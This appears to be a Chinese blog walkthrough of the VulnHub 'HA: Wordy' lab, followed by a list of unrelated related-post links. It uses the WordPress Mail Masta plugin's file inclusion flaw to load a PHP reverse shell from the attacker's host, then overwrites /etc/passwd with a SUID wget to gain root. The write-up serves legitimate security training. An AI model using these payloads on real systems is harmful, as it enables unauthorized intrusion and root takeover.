HA: Wordy靶场

HA: Wordy

来自 < HA: Wordy ~ VulnHub>

1,将两台虚拟机网络连接都改为NAT模式

2,攻击机上做namp局域网扫描发现靶机

nmap -sn 192.168.23.0/24

那么攻击机IP为192.168.23.128,靶场IP192.168.23.130

3,对靶机进行端口服务探测

nmap -sV -T4 -p- -A 192.168.23.130

4,这个网站是一个默认页面

dirsearch -u http://192.168.23.130/ -x 403,404

网站应该是一个wordpress建站系统

查看网站安装的插件

检索这个插件存在的漏洞

searchsploit mail masta

然后查看漏洞利用方法

searchsploit -m 40290.txt

cat 40290.txt

http://192.168.23.130/wordpress/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd

漏洞利用成功,尝试污染日志文件,然后通过文件包含漏洞getshell。

5,第二种方法,测试是否存在远程文件包含漏洞

http://192.168.23.130/wordpress/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=https://www.baidu.com

存在,那么就可以通过远程文件包含漏洞进行写马操作,使用kali自带的木马

cp /usr/share/webshells/php/php-reverse-shell.php .

mv php-reverse-shell.php shell.php

vim shell.php

注意修改反弹shell的IP和端口

python -m http.server

http://192.168.23.130/wordpress/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=http://192.168.23.128:8000/shell.php

与此同时需要打开对4444端口的监听

nc -lvvp 4444

成功getshell

6,使用python脚本启动一个交互式shell,没有python这个命令

查看一下怎么提权

sudo -l

find / -type f -perm -u=s -user root 2>/dev/null

使用wget -O 提权,利用wget -O命令覆盖/etc/passwd文件

在kali上创建文本文件,取名passwd,并将靶机/etc/passwd文件的内容复制进去。因为之后要覆盖靶机的/etc/passwd,所以名字要一模一样

vim passwd

openssl passwd -1 123456

cat passwd

然后再开启一个

python -m http.server

cd /tmp

wget http://192.168.23.128:8000/passwd

cp passwd /etc/passwd

python3 -c 'import pty;pty.spawn("/bin/bash")'

su

相关推荐
千寻xun2 小时前
一、理论篇-NVME协议学习笔记
笔记·学习·fpga开发·nvme ssd·nvme协议
xixixi777774 小时前
三大 AI 安全里程碑:Akamai 高危风险预警、智能体水印强制落地、PQC 量子安全全产业链统一
大数据·人工智能·安全·ai·大模型·智能体·政策
hz567897 小时前
电子远程评标系统哪家好?安全、合规、易用平台评测指南
安全·云计算·音视频·实时音视频·信息与通信
MartinYeung57 小时前
[论文学习]大语言模型安全综述:攻击、防御、对齐、度量与护栏的深度解析
学习·安全·语言模型
Piko6147 小时前
锐捷 VSU 虚拟化堆叠配置
运维·网络·笔记
2301_780303908 小时前
网络安全、自动化运维、ERP、CRM、MES
运维·web安全·网络安全·自动化·安全威胁分析
AOwhisky8 小时前
Python 学习笔记(第三期)——流程控制:条件判断与循环结构
运维·笔记·python·学习·云原生·流程控制·循环
学逆向的9 小时前
汇编——内存
开发语言·汇编·算法·网络安全
Piko6149 小时前
锐捷交换机 DHCP Server部署
运维·网络·笔记
卓豪终端管理10 小时前
企业数据防泄漏:现代设备控制如何成为终端安全的关键防线
安全